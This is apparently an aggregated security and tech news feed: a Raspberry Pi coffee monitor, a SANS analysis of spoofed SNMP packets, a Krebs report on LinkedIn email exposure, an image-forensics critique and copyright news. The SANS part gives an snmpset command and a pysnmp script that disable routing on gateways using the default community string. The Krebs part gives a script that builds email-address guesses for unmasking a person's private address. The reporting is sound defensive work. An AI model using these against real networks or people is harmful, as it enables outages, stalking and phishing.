Since this was a greenfield project, I wanted to work with an unfamiliar language. I felt like the more functional nature of Clojure would be a great fit for passing along a single piece of state. This turned out to be a great decision, and I’ll explain why in a minute.

Graph it home

I hacked together a quick program that would spit out the current temperature, minute’s running average, hour’s running average, and the running average’s rate of change to a log file so I could analyze them.

...
{"current":32.062, "minute":24.8747, "hour":23.5391, "running-rate":0.039508}
{"current":32.437, "minute":25.0008, "hour":23.5635, "running-rate":0.0423943}
{"current":32.875, "minute":25.1322, "hour":23.5897, "running-rate":0.045361}
{"current":33.625, "minute":25.2738, "hour":23.6177, "running-rate":0.048569}
{"current":33.625, "minute":25.413, "hour":23.6476, "running-rate":0.05159}
{"current":33.625, "minute":25.55, "hour":23.6793, "running-rate":0.054437}
...

Log files in hand, I temporarily turned back to Ruby using the wonderful Gruff charting library to visualize things and make patterns easier to spot.

A few batches of hot water gave me a decent idea what things should look like, so I moved our coffee equipment to my desk to get some live data. This let me check in with the actual running state of the program and compare it with the status of the pot (and led to some coworker laughs and a wonderful smell at my workspace all day).


A brewing or fresh pot is easy to recognize, but figuring out when the pot is empty turned out to be a little tricky. It takes a while for the Chemex to completely cool off, which means it could be empty and still warm, which I’m sure would lead to more than a few disappointing trips to the kitchen. Luckily, the rate a pot cools tells us if it is empty or not—for instance, a half-full pot stays warm longer than an empty one simply because of the coffee still in it. Always nice to have physics on your side.

Watchers for the win

Armed with the collection of datapoints (running averages, rate of change, etc.) for each of the pot’s states, I moved on to figuring out how to notify our department’s group chat room when a pot was brewing, ready, empty, or stale. This is where some of the built-in features of Clojure came in handy.

I already had a program that logged the current state of itself every second. By switching the actual state to an agent, I could apply watchers to it. These watchers get called whenever the agent changes, which is perfect for analyzing changes in state.

Another agent I added was the pot itself. The watcher for the temperature would look for the above-mentioned boundaries and update the pot’s state, leaving another watcher to track the pot and notify our chat room. When it came time to pick an alias to deliver the notifications, Dave Grohl was the natural choice.

Here’s a simple example of the pot watcher looking for a brewing pot:

;; The pot's status lives in an agent, starting out empty.
(def pot-status
  (agent {:status "empty"}))

;; Watch function: called whenever pot-status changes (not on every
;; temperature reading), notifying the chat room when brewing starts.
(defn pot-watcher [watcher status old_status new_status]
  (if (= (:status new_status) "brewing")
    (notify/is_brewing)))

;; Register the watcher against the agent.
(add-watch pot-status :pot-watcher pot-watcher)

The great thing is the watcher only gets called when the status changes, not on each tick of the temperature. Using agents felt great to me in this case, as they provided a clean way to watch state (without callbacks or a ton of boilerplate) and maintain separation of concerns between different parts of the program.


Freshness into the future

I’m still working out a few kinks, tuning the bounds, and keeping a log of pots. It’s been a fun experience and I learned a ton. Something tells me this won’t be the last time we work with Raspberry Pi on a project. What’s next, Fresh Pots in space? Luckily, we’ve got plenty of coffee to propel us.


Ben: Thanks to Steven and MailChimp for permission to use the post – we’re very pleased to see the Pi used as the tool of choice of coffee-hungry developers around the world! Coffee is important to us here at Pi Towers…

Trojan Room Coffee Pot

Blast from the past – remember this coffee pot?

MailChimp is what I use to power Pi Weekly – my weekly Raspberry Pi news & projects email newsletter – check it out at piweekly.net!

LWN.net: Freenode server compromised

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

“The freenode infrastructure team found a server issue that indicated that an IRC server may have been compromised. We immediately started an investigation to map the extent of the problem and located similar issues with several other machines and have taken those offline. For now, since network traffic may have been sniffed, we recommend that everyone change their NickServ password as a precaution.” (Thanks to Paul Wise)

SANS Internet Storm Center, InfoCON: green: Spoofed SNMP Messages: Mercy Killings of Vulnerable Networks or Troll?, (Mon, Sep 15th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

2nd Update

All the packet captures we received so far show the same behavior. The scans are sequential, so it is fair to assume that this is an internet-wide scan. We have yet to find a vulnerable system, and I don’t think that vulnerable configurations are very common, but please let me know if you know of widely used systems that allow these SNMP commands. This could also just be a troll checking “what happens if I send this”.

1st Update

Thanks to James for sending us some packets. Unlike suggested earlier, this doesn’t look like a DoS against Google, but more like a DoS against vulnerable gateways. The SNMP command is actually a “set” command using the default read-write community string “private”. If successful, it should:

- set the default TTL to 1, which would make it impossible for the gateway to connect to other systems that are not on the same link-layer network.

- turn off IP forwarding.

Still playing with this, and so far, I haven’t managed to “turn off” any of my test systems. If you want to play, here are some of the details:

The SNMP payload of the packets reported by James:

Simple Network Management Protocol
    version: version-1 (0)
    community: private
    data: set-request (3)
        set-request
            request-id: 1821915375
            error-status: noError (0)
            error-index: 0
            variable-bindings: 2 items
                1.3.6.1.2.1.4.2.0:
                    Object Name: 1.3.6.1.2.1.4.2.0 (iso.3.6.1.2.1.4.2.0)
                    Value (Integer32): 1
                1.3.6.1.2.1.4.1.0:
                    Object Name: 1.3.6.1.2.1.4.1.0 (iso.3.6.1.2.1.4.1.0)
                    Value (Integer32): 2

 

The snmp set command I am using to re-create the traffic:

snmpset  -v 1 -c private [target ip] .1.3.6.1.2.1.4.2.0 int 1 .1.3.6.1.2.1.4.1.0 int 2
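
For those who would rather script the same lab test, here is a rough equivalent using Python’s pysnmp (my choice of library, not something from the reports; the target address is a placeholder). The two OIDs are MIB-II’s ipDefaultTTL and ipForwarding:

# Rough pysnmp equivalent of the snmpset command above; lab use only.
# 1.3.6.1.2.1.4.2.0 = ipDefaultTTL (set to 1)
# 1.3.6.1.2.1.4.1.0 = ipForwarding (2 = notForwarding)
from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity,
                          Integer, setCmd)

errorIndication, errorStatus, errorIndex, varBinds = next(setCmd(
    SnmpEngine(),
    CommunityData('private', mpModel=0),       # SNMPv1, community "private"
    UdpTransportTarget(('192.0.2.1', 161)),    # placeholder lab target
    ContextData(),
    ObjectType(ObjectIdentity('1.3.6.1.2.1.4.2.0'), Integer(1)),
    ObjectType(ObjectIdentity('1.3.6.1.2.1.4.1.0'), Integer(2))))
print(errorIndication or varBinds)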

Any insight is welcome. Still working on this, and there may be more to it than I see now (or less…)

 

— end of update —

We are receiving some reports about SNMP scans that claim to originate from 8.8.8.8 (Google’s public recursive DNS server). This is likely part of an attempt to launch a DDoS against Google by using SNMP as an amplifier/reflector.

Please let us know if you see any of these packets. The source IP should be 8.8.8.8 and the target port should be 161 UDP. For example, in tcpdump:

tcpdump -s0 -w /tmp/googlensmp dst port 161 and src host 8.8.8.8

Thanks to James for sending us a snort alert triggered by this:

Sep 15 11:07:07 node snort[25421]: [1:2018568:1] ET CURRENT_EVENTS Possible Inbound SNMP Router DoS (TTL 1) [Classification: Attempted Denial of Service] [Priority: 2] {UDP} 8.8.8.8:47074 -> x.x.251.62:161

So far, it does not look like service to Google’s DNS server is degraded.


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: ISP Wants Court to Sanction Piracy Monitoring Firm

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

rightscorp-realFor several months Rightscorp has been sending DMCA subpoenas to smaller local ISPs in the United States.

Unlike regular subpoenas, these are not reviewed by a judge and only require a signature from the Court clerk. This practice raised questions because DMCA subpoenas are not applicable to file-sharing cases, which is something courts determined more than a decade ago.

Perhaps unaware of the legal precedent, most ISPs have complied with the requests. Until last week, that is, when small Texas provider Grande Communications stood up in court after it was asked to reveal the account details connected to 30,000 IP-address/timestamp combinations.

Soon after Grande filed its objections, Rightscorp decided to drop the request entirely. While the ISP is pleased that its customers will no longer be exposed, the company is not letting Rightscorp off the hook.

In an advisory to the court (pdf) the ISP notes that Rightscorp’s actions suggest that it’s merely trying to avoid having a judge look at their dubious efforts.

“The abrupt withdrawal of the Subpoena is consistent with the apparent desire of Rightscorp and its counsel to avoid judicial review of their serial misuse of the subpoena power of the federal courts,” Grande’s attorneys write.

The ISP still wants Rightscorp to pay for the costs run up thus far. In addition, Grande also believes that sanctions for misusing the federal court’s subpoena powers may be in order.

“The U.S. District Court for the Central District of California may consider ordering Rightscorp and its counsel to show cause why they should not be sanctioned for misusing the federal court’s subpoena powers,” the advisory reads.

The ISP points out that if it hadn’t challenged the subpoena, the personal details of hundreds or thousands of subscribers would have been shared based on a faulty procedure. Since similar requests are being sent to other ISPs, the matter warrants further investigation.

“It appears clear that Rightscorp and its counsel are playing a game without regard for the rules, and they are playing that game in a manner calculated to avoid judicial review. Hopefully, they will not be permitted to continue much longer,” Grande’s attorneys conclude.

Rightscorp’s withdrawal of the subpoena also contradicts earlier comments the company’s CEO Christopher Sabec made to TorrentFreak.

Sabec told us that the company believes that earlier decisions on the legitimacy of DMCA subpoenas in file-sharing cases were wrong, and will be overturned should the issue reach the Supreme Court.

Apparently, this was a veiled threat, perhaps to discourage Internet providers from starting a battle that could get very expensive. Instead, with possible sanctions pending, things may now get expensive for Rightscorp.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: LinkedIn Feature Exposes Email Addresses

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing.

LinkedIn has built much of its considerable worth on the age-old maxim that “it’s all about who you know”: As a LinkedIn user, you can directly connect with those you attest to knowing professionally or personally, but also you can ask to be introduced to someone you’d like to meet by sending a request through someone who bridges your separate social networks. Celebrities, executives or any other LinkedIn users who wish to avoid unsolicited contact requests may do so by selecting an option that forces the requesting party to supply the personal email address of the intended recipient.

LinkedIn’s entire social fabric begins to unravel if any user can directly connect to any other user, regardless of whether or how their social or professional circles overlap. Unfortunately for LinkedIn (and its users who wish to have their email addresses kept private), this is the exact risk introduced by the company’s built-in efforts to expand the social network’s user base.

According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users.

LinkedIn assumes that if an email address is in your contacts list, that you must already know this person. But what if your entire reason for signing up with LinkedIn is to discover the private email addresses of famous people? All you’d need to do is populate your email account’s contacts list with hundreds of permutations of famous peoples’ names — including combinations of last names, first names and initials — in front of @gmail.com, @yahoo.com, @hotmail.com, etc. With any luck and some imagination, you may well be on your way to an A-list LinkedIn friends list (or a fantastic set of addresses for spear-phishing, stalking, etc.).

LinkedIn lets you know which of your contacts aren’t members.

When you import your list of contacts from a third-party service or from a stand-alone file, LinkedIn will show you any profiles that match addresses in your contacts list. More significantly, LinkedIn helpfully tells you which email addresses in your contacts lists are not LinkedIn users.

It’s that last step that’s key to finding the email address of the targeted user to whom LinkedIn has just sent a connection request on your behalf. The service doesn’t explicitly tell you that person’s email address, but by comparing your email account’s contact list to the list of addresses that LinkedIn says don’t belong to any users, you can quickly figure out which address(es) on the contacts list correspond to the user(s) you’re trying to find.

Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information. Last month, the two researchers detailed how they were able to de-anonymize posts to Secret, an app-driven online service that allows people to share messages anonymously within their circle of friends, friends of friends, and publicly. In February, Seely more famously demonstrated how to use Google Maps to intercept FBI and Secret Service phone calls.

This time around, the researchers picked on Dallas Mavericks owner Mark Cuban to prove their point with LinkedIn. Using their low-tech hack, the duo was able to locate the Webmail address Cuban had used to sign up for LinkedIn. Seely said they found success in locating the email addresses of other celebrities using the same method about nine times out of ten.

“We created several hundred possible addresses for Cuban in a few seconds, using a Microsoft Excel macro,” Seely said. “It’s just a brute-force guessing game, but 90 percent of people are going to use an email address that includes components of their real name.”
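
A macro like that takes only a few lines in any language. Here is a rough Python rendering of the idea (the name parts and providers are examples only, not Rhino’s actual list):

# Sketch of the brute-force address list Rhino built (theirs was an Excel
# macro). Feeding these into a contacts import and diffing against
# LinkedIn's "not a member" list reveals which guesses are live accounts.
first, last = "mark", "cuban"
providers = ["gmail.com", "yahoo.com", "hotmail.com"]

# Common local-part patterns built from a real name.
local_parts = [
    first + last,          # markcuban
    first + "." + last,    # mark.cuban
    first + "_" + last,    # mark_cuban
    first[0] + last,       # mcuban
    first + last[0],       # markc
    last + first,          # cubanmark
]
guesses = ["%s@%s" % (lp, p) for lp in local_parts for p in providers]
print(len(guesses), guesses[:3])   # 18 candidate addresses to import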

The Rhino guys really wanted Cuban’s help in spreading the word about what they’d found, but instead of messaging Cuban directly, Seely pursued a more subtle approach: He knew Cuban’s latest start-up was Cyber Dust, a chat messenger app designed to keep your messages private. So, Seely fired off a tweet complaining that “Facebook Messenger crosses all privacy lines,” and that as a result he was switching to Cyber Dust.

When Mark Cuban retweeted Seely’s endorsement of Cyber Dust, Seely reached out to Cyber Dust CEO Ryan Ozonian, letting him know that he’d discovered Cuban’s email address on LinkedIn. In short order, Cuban was asking Rhino to test the security of Cyber Dust.

“Fortunately no major faults were found and those he found are already fixed in the coming update,” Cuban said in an email exchange with KrebsOnSecurity. “I like working with them. They look to help rather than exploit.. We have learned from them and I think their experience will be valuable to other app publishers and networks as well.”

Whether LinkedIn will address the issues highlighted by Rhino Security remains to be seen. In an initial interview earlier this month, the social networking giant sounded unlikely to change anything in response.

Corey Scott, director of information security at LinkedIn, said very few of the company’s members opt in to the requirement that all new potential contacts supply the invitee’s email address before sending an invitation to connect. He added that email-address-to-user mapping is a fairly common design pattern that is not unique to LinkedIn, and that nothing the company does will prevent people from blasting emails to lists of addresses that might belong to a targeted user, hoping that one of them will hit home.

“Email address permutators, of which there are many of them on the ‘Net, have existed much longer than LinkedIn, and you can blast an email to all of them, knowing that most likely one of those will hit your target,” Scott said. “This is kind of one of those challenges that all social media companies face in trying to prevent the abuse of [site] functionality. We have rate limiting, scoring and abuse detection mechanisms to prevent frequent abusers of this service, and to make sure that people can’t validate spam lists.”

In an email sent to this reporter last week, however, LinkedIn said it was planning at least two changes to the way its service handles user email addresses.

“We are in the process of implementing two short-term changes and one longer term change to give our members more control over this feature,” LinkedIn spokeswoman Nicole Leverich wrote in an emailed statement. “In the next few weeks, we are introducing new logic models designed to prevent hackers from abusing this feature. In addition, we are making it possible for members to ask us to opt out of being discoverable through this feature. In the longer term, we are looking into creating an opt-out box that members can choose to select to not be discoverable using this feature.”

LWN.net: LedgerSMB 1.4.0 released

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Version 1.4.0 of the LedgerSMB accounting system is out. It features a new
contact management subsystem, a reworked report generation subsystem,
better integration with other business applications, and more. The
announcement left out download information; those who are interested can
find the software at ledgersmb.org.

TorrentFreak: Email: Warner Bros Conspired with New Zealand Over Kim Dotcom Extradition

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Ever since the raids of 2012, Kim Dotcom has pointed to what he sees as a contract shutdown of Megaupload, designed by Hollywood and carried out by its partners in the Obama administration and the New Zealand Government. Dotcom claims that his fate was pre-determined and the result of corruption.

One of his claims is that despite the reservations of those in New Zealand’s intelligence departments, Dotcom was allowed to become a resident of the country. This, the entrepreneur says, was carried out to pin him down in a friendly location so that he could be dealt with by the United States.

This morning, at his Moment of Truth event, Dotcom rolled out big guns including journalist Glenn Greenwald, Wikileaks’ Julian Assange and even Edward Snowden himself to deliver his “bombshell”. The latter two appeared via video links, connections which Dotcom said were being run through a new encrypted browser-based platform under development at Mega.

Much of the discussion centered on the alleged unlawful domestic surveillance of New Zealand citizens by their own Government, but the panel frequently wove in elements of Dotcom’s own unique situation.

“We share the same prosecutor, so I understand what is going on there, on a very personal level,” Julian Assange said of Dotcom.

“[The United States Government] is trying to apply US law in as many countries as possible, applying their law in New Zealand to coerce and pluck out people to other states,” Assange said.

“When you are able to control their police forces you have succeeded in annexing that country. It’s a problem for me personally and it’s a problem for Kim Dotcom.”

Dotcom’s human rights lawyer Robert Amsterdam spoke at length on the perils of the Trans Pacific Partnership and criticized the New Zealand Government for its treatment of Dotcom.

“What they did [to Kim Dotcom during the 2012 raid] is so beyond the pale that the leader of that democratic government should have resigned on the spot that day,” Amsterdam said.

The event was highly polished and was well received by those in attendance, but failed to deliver on one key front. Dotcom previously said that he would present “absolutely concrete” evidence that Prime Minister John Key knew about him earlier than he had claimed. In the event, nothing remotely of that nature was presented.

However, several hours before the Moment of Truth got off the ground, New Zealand media began reporting that Dotcom would reveal an email at the event, one that would prove that Hollywood had an arrangement with Key to allow Dotcom into the country in order to extradite him to the United States.

The email in question, dated October 27, 2010, was allegedly sent by current Warner Bros CEO Kevin Tsujihara to Michael Ellis of the MPA/MPAA.

Tsujihara is one of the Warner executives the company sent to New Zealand in 2010 to deal with a dispute that was putting at risk the filming of the Hobbit movies in the country. During his visit Tsujihara met John Key and the email purports to report on one of those meetings.

“Hi Mike. We had a really good meeting with the Prime Minister. He’s a fan and we’re getting what we came for,” the leaked copy of the email reads.

“Your groundwork in New Zealand is paying off. I see strong support for our anti-piracy effort. John Key told me in private that they are granting Dotcom residency despite pushback from officials about his criminal past. His AG will do everything in his power to assist us with our case. VIP treatment and then a one-way ticket to Virginia.

“This is a game changer. The DOJ is against the Hong Kong option. No confidence in the Chinese. Great job,” the email concludes.

But while an email of this nature would have indeed warranted a “bombshell” billing, the Moment of Truth concluded without it or any other similar evidence being presented. Even before the event began, Warner Bros were on record describing the email as a fake.

“Kevin Tsujihara did not write or send the alleged email, and he never had any such conversation with Prime Minister Key,” said Paul McGuire, Warner Bros.’ senior vice president for worldwide communications.

“The alleged email is a fabrication,” he added.

The lack of the promised big reveal is fairly dramatic in itself. It’s certainly possible that Dotcom’s team lost confidence and pulled the reveal at the last minute, which would be a wise move if its authenticity was in doubt.

If the email is indeed proven to be a fake, big questions will need to be answered by the person who provided it because up until very recently Dotcom was staking his shirt on it. If it’s genuine, and proving that will be easier said than done now, we’ll definitely hear more as the weeks unfold.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: A Novel Approach

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’ve previously written about why I dislike the academic publication process. In particular, the publication process is not fast; papers can take years to become published. Peer review means almost nothing with regards to completeness, accuracy, or applicability. Most papers are far too complicated for anyone but the author to understand. References are usually incomplete and heavily biased toward tight circles of friends. When papers are published, the cost of reading them is prohibitive; only the wealthy can access these papers (and given the errors and oversights, most papers are not worth the cost). And finally, there’s the entire oneupmanship issue, where one minor change is deemed worthy of a full paper and not just a footnote.

Along these same lines, I think the term “novel” is overused in academic papers. According to Webster’s dictionary, novel refers to something “new and not resembling something formerly known or used”, or something that is “original or striking especially in conception or style”. However, academic articles typically use “novel” to mean “I couldn’t find someone else who found this same minor result.” When I see ‘novel’ in a paper’s title, I associate it with a three-year-old yelling “Mom! Mom! Mom! Look! Look! Look at what I can do!”

I searched Google Scholar for academic articles that used the word “novel” in their title. There were about 737,000 results. Then I began to read some of the PDF documents. A few did appear to be novel, but the vast majority were minor changes to existing approaches that had minimal differences in the results and were applicable to specific corner-case situations. I would hardly call them “novel”.

It’s Novel!

One of my loyal blog readers pointed me to an article in the Journal of Forensic Sciences: “A Novel Forged Image Detection Method Using the Characteristics of Interpolation” (Hwang and Har in J Forensic Sci, January 2013, Vol. 58, No. 1). He noted that the results look similar to Error Level Analysis and wanted my thoughts on the algorithm.

The paper’s basic approach: rather than using a JPEG resave to reduce noise in the picture, this approach uses a scaling algorithm. For example, you take your 4000×3000 picture and scale it to 72% of the original size (to 2880×2160). Then you scale it back up to 4000×3000 and compare the difference with the original picture. Digital alterations should appear as an altered area in the picture.

In the paper, they even discuss using different scaling algorithms: nearest neighbor, bilinear, and bicubic. (However, their paper makes it sound like these are the only scaling algorithms.)
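
For readers who want to experiment, the round trip is easy to reproduce with an image library. Here is a rough sketch using Python and the Pillow library (9.1 or later for Image.Resampling); it is not the authors’ code, and the 72% factor and the tenfold amplification of the difference are arbitrary choices for visualization.

    # Rough sketch of the paper's scale-compare method using Pillow.
    # Not the authors' code; scale factor and amplification are arbitrary.
    from PIL import Image, ImageChops

    orig = Image.open("photo.jpg").convert("RGB")
    w, h = orig.size
    factor = 0.72
    down = orig.resize((int(w * factor), int(h * factor)),
                       Image.Resampling.BICUBIC)
    up = down.resize((w, h), Image.Resampling.BICUBIC)

    # The round trip discards high frequencies; edited regions tend to
    # lose them at a different rate than the untouched areas.
    diff = ImageChops.difference(orig, up)
    diff.point(lambda v: min(255, v * 10)).save("scale-compare.png")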

My criticisms of this paper are not related to their approach. Rather, I’m more concerned with the missing discussion of limitations, the lack of detail on how they determined parameters, the failure to mention applicability, and whether this is really “novel”.

But before discussing the limitations, let’s focus on the good parts. First off, the paper is relatively well written and easy to understand. The algorithm is a logical extension to existing knowledge.

How it works

Digital pictures contain high frequency and low frequency components. The low frequencies define the overall structure of the image. The high frequencies fill in details. And camera sensors introduce extremely high frequencies that we may not visually notice.

There are lots of different algorithms that measure signal noise. Error Level Analysis (ELA) is one such example. It measures the lossiness from repeated JPEG compressions. A picture with more high frequency noise will change more during a JPEG save than a lower quality picture. And when a picture is first altered, the modified areas will usually have a significantly different error level potential.
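
For comparison, the core of an ELA-style check also fits in a few lines. This is a simplified sketch rather than the FotoForensics implementation; quality 95 and the fifteenfold amplification are common but arbitrary choices.

    # Simplified ELA-style sketch: resave the picture as JPEG once and
    # see what changed. Quality 95 and x15 amplification are arbitrary.
    import io
    from PIL import Image, ImageChops

    orig = Image.open("photo.jpg").convert("RGB")
    buf = io.BytesIO()
    orig.save(buf, format="JPEG", quality=95)
    resaved = Image.open(buf)

    # Regions with a different compression history show different
    # error levels after the resave.
    ela = ImageChops.difference(orig, resaved)
    ela.point(lambda v: min(255, v * 15)).save("ela.png")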

There are two JPEG properties that permit ELA to work. The first is JPEG’s use of integer values. Each JPEG save converts the picture to frequencies using floating-point values. But then the values are stored as integers, resulting in fractional truncations. These lost fractions cause JPEG to be a lossy format since some information is removed each time the picture is saved.

The second JPEG property is the use of discrete cosine transforms (DCTs) with weighted quantization matrices (Q tables). The Q tables identify how large the truncated fractions can be. In general, high frequencies are cut off more than low frequencies — this is because low frequencies define the picture’s shape. If a little of the fine detail is removed, most people won’t notice the impact to the picture. (For more details on how JPEG compression works, see “How I Met Your Mother Through Photoshop”.)

Any algorithm that reduces high frequencies and uses integer truncation should be able to identify similar high-frequency edits.

JPEG compression is not the only way to remove high frequencies from a picture. As I mentioned in “Quality is Job One”, simply scaling the picture smaller will remove high frequencies. If you scale a picture smaller and then scale it back up, it will look blurrier than the original picture because the high-frequency fine details are removed. Specifically, the scaling removes values (a lossy transformation) and the integer truncations make the loss permanent.

In this example, I scaled the picture to 25% of the full size, then scaled it back up. You can see how the scaled larger picture lost high frequencies and looks blurrier compared to the source picture.

The main difference between the JPEG resave and image scaling approaches concerns where the cutoffs occur. With JPEG, each DCT value represents a frequency band. Every frequency band loses a little, but the higher frequencies lose more than the low frequencies. With scaling, you only lose the high frequencies and not a little from every frequency band.

Enough theory! Show me pictures!

So here’s an example from a picture uploaded to FotoForensics. The source picture was scaled smaller, to 80% of the original size using a bicubic algorithm. When it was scaled larger, high frequency details were lost. Then I compared the difference between the rescaled picture and the source:

In this example, you can see how the algorithm highlights the areas that were modified in the source picture. This happens because the unmodified areas lost high frequencies at a different rate compared to the modified areas.

And the bad news?

The first thing to notice is that every sample picture in their paper shows that their algorithm works. But every one of those samples was created by the authors of the paper. In effect, they selectively chose/manufactured pictures that would give the appearance of a high-performance algorithm.

I ran the algorithm past 100 pictures from FotoForensics. I used both bilinear and bicubic scaling, and scale values between 50% and 100%. The scale-compare algorithm was able to highlight modifications in ten pictures. It missed all of the others, a 90% failure rate. Moreover, the cases where it worked are all extreme pictures: large images where the modifications are so obvious that they were caught by every frequency analysis algorithm I have.

Here is the same example of a modified image (left), along with the ELA (middle) and their scaling comparison (using 80% reduction with bicubic scaling) on the right.

And here’s a typical case where scale-compare missed it. Again, ELA is the 2nd image and scale-compare is on the right:

And here’s another example from Reddit’s Photoshopbattles: “Guy riding a dinosaur”. Yes, they removed two people riding a dinosaur… ELA shows the modified areas, but scale-compare failed to highlight anything.

ELA certainly isn’t perfect. If a picture undergoes multiple resaves, scaling, or significant recoloring, then the noise patterns are all normalized and ELA will not highlight anything abnormal. In every instance where ELA was unable to highlight modifications, scale-compare also failed.

There are other limitations with this research. For example:

  • They suggest using bilinear, bicubic, and nearest neighbor for scaling. However, they don’t discuss the circumstances when one will work and another will fail.

  • The paper says to use “1/N” and “N” as the reduction and enlargement scaling factors. However, they never explain how to find a good “N” value. Their samples use values such as 86%, 74%, and 53%, but with no explanation of how they came up with those values. (I suspect brute-force trial and error until they found one that looked good for their paper.)
  • This scale-compare algorithm can highlight significant differences in noise quality. However, it is mostly limited to detecting smudge and blurs. It typically misses splices.
  • The last paragraph in the paper does mention one limitation. It says that scale-compare does not work well for pictures saved using “compression quality <6 in Photoshop”. However, it also does not work with higher compression levels, pictures that have been repeatedly resaved, most web-size pictures (those less than 800×800), and anything from Facebook, Instagram, Twitter, and most online dating sites. Scaling a picture smaller will lessen the ability to highlight modifications, and significant scaling will completely remove this algorithm’s ability to detect alterations. (I’m ignoring the issue about the values from Photoshop Quality 6 changing based on the version of Photoshop.)
  • There’s also a lack of information about performance. No metrics about the ability to highlight modifications from a random selection of images, and nothing about speed. Scaling a large picture twice can be significantly slower than saving and loading the image.

Finally, they did not mention any other variations to this approach. For example, you can apply a Gaussian blur, box filter blur, or FFT low-pass filter to the picture in order to remove high frequencies. Each of these will work just as well as their scale-compare algorithm.

Here’s that same sample picture, compared against a box-filter blur of itself. The results are almost the same as the scale-compare algorithm, but took a fraction of the time to compute:
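
In code, the blur-compare variant simply swaps the resize round trip for a single filtering pass. Again a sketch, with a guessed box-filter radius:

    # Blur-compare variant: a box filter strips high frequencies in one
    # pass instead of a downscale/upscale round trip. Radius is a guess.
    from PIL import Image, ImageChops, ImageFilter

    orig = Image.open("photo.jpg").convert("RGB")
    blurred = orig.filter(ImageFilter.BoxBlur(1))
    diff = ImageChops.difference(orig, blurred)
    diff.point(lambda v: min(255, v * 10)).save("blur-compare.png")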

Mom! Mom! Mom! Look! Look! Look at what I can do!

This scale-and-compare method described by Hwang and Har is yet another approach to detecting changes in high-frequency noise. However, there are no situations where this approach will detect something that other, faster algorithms would miss. Moreover, Hwang and Har left out a significant amount of information, such as how to tune parameters. Finally, their approach relies on well-known artifacts from scaling and blurring, and the common method of comparing against the original size; none of this is new or “novel”.

Back in 2005, Hsiao and Pei wrote “Detecting digital tampering by blur estimation”. This paper uses a variation of the Gaussian blur and box filter blur comparison that I described. And in 2008, Mahdian and Saic wrote “Blind Authentication Using Periodic Properties of Interpolation”, where they actually used bilinear and bicubic scaling to identify alterations (see the Mahdian/Saic PDF pages 6-7) and extended it to handle rotations and skewing. (And Hwang/Har knew about Mahdian/Saic, since they listed that paper as citation #18.) To put it bluntly, the work by Hwang and Har is an interesting rewrite of existing technologies, but it is incomplete, heavily biased, and certainly not “novel”.

Errata Security: Hacker "weev" has left the United States

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Hacker Andrew “weev” Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country.

I wonder what that means. On one hand, he could go full black-hat and go on a hacking spree. Hacking doesn’t require anything more than a cheap laptop and a dial-up/satellite connection, so it can be done from anywhere in the world.

On the other hand, he could also go full white-hat. There is lots of useful white-hat research that we don’t do because of the chilling effect of government. For example, in our VNC research, we don’t test default password logins for some equipment, because this can be interpreted as violating the CFAA. However, if ‘weev’ never intends to travel to an extradition country, he can do that kind of work and report the results to help us secure systems.

Thirdly, he can now freely speak out against the United States. Again, while we theoretically have the right to “free speech”, we see how those like Barrett Brown are in jail purely because they spoke out against the police state.

TorrentFreak: Censorship Is Not The Answer to Online Piracy

This post was syndicated from: TorrentFreak and was written by: Simon Frew. Original post: at TorrentFreak

This is a guest post written by Simon Frew, Deputy President of Pirate Party Australia.

The Australian Government recently called for submissions into its plans to introduce a range of measures that are the long-standing dreams of the copyright lobby: ISP liability, website blocking for alleged pirate sites and graduated response.

The Government’s discussion paper specifically asked respondents to set aside other Government inquiries into copyright: an inquiry by the Australian Law Reform Commission (ALRC) into copyright in the digital economy, and an IT pricing inquiry. Both reviews covered important aspects of sharing culture in the 21st century, yet the paper passed over them entirely and instructed respondents to do the same.

The ALRC review examined issues around the emerging remix culture, the ways the Australian copyright regime limits options for companies to take advantage of the digital environment, and issues around fair dealing and fair use. It recommended a raft of changes to modernize Australian copyright law for the digital age. Whilst the recommendations were modest, they were a step in the right direction, but that step has been ignored by the Australian Parliament.

The IT pricing inquiry, held last year, looked into why Australians pay exorbitant prices for digital content, a practice that has been dubbed the Australia Tax. Entertainment and tech companies were dragged in front of the inquiry to explain why Australians pay much more for products than residents of other countries. The review found that Australians pay up to 84% more for games, 52% more for music and 50% more for professional software than residents of comparable countries. The outcome was to look at ways to end geographic segmentation, and to continue to turn a blind eye to people using Virtual Private Networks (VPNs) to circumvent the higher prices in Australia.

Between the Australia Tax and the substantially delayed release dates for TV shows and movies, Australians don’t feel too bad about accessing content by other means. According to some estimates, over 200,000 Australians have Netflix accounts, accessing the service through VPNs.

Pirate Party Australia (PPAU) responded to the latest review with a comprehensive paper, outlining the need to consider all of the evidence and what that evidence says about file-sharing.

To say the Government’s discussion paper was biased understates the single-mindedness of the approach being taken by the Government. Mozart Olbrycht-Palmer, a co-author of the Pirate Party submission, summed it up:

